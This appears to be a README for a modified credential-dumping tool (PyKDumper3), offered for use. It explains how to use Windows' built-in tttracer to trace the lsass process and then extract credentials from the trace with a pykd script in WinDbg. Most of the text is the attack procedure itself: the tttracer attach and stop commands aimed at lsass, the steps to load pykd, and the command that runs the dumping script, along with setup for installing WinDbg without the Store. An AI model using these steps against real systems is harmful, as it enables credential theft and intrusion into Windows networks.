PyKDumper3 modified for TTTracer credentials dumpping
Found this twitter post: https://twitter.com/n_o_t_h_a_n_k_s/status/1559620227586875392
It is an interesting built-in method to dump lsass memory.
-
Windows machine
-
Windbg Preview Without Microsoft Store:
- Paste the Microsoft Store windbg link into https://store.rg-adguard.net/ to receive a download link
- Wget the appx file
wget -O windbg.appx https://link
- Double click to install it
Ref: https://digitalitskills.com/windbg-preview-download-and-install-without-ms-store/
Powershell session 1:
tttracer -dumpfull -attach (Get-Process lsass | Select -expand id)
Wait 3-6s please...
Powershell session 2:
tttracer -stop (Get-Process lsass | Select -expand id)
Download pykd and copy pykd.dll to %LocalAppData%\Dbg\EngineExtensions
windbg load .run file
windbg cmd:
.load pykd
!py path_to_script\PyKDumper3_tttracer.py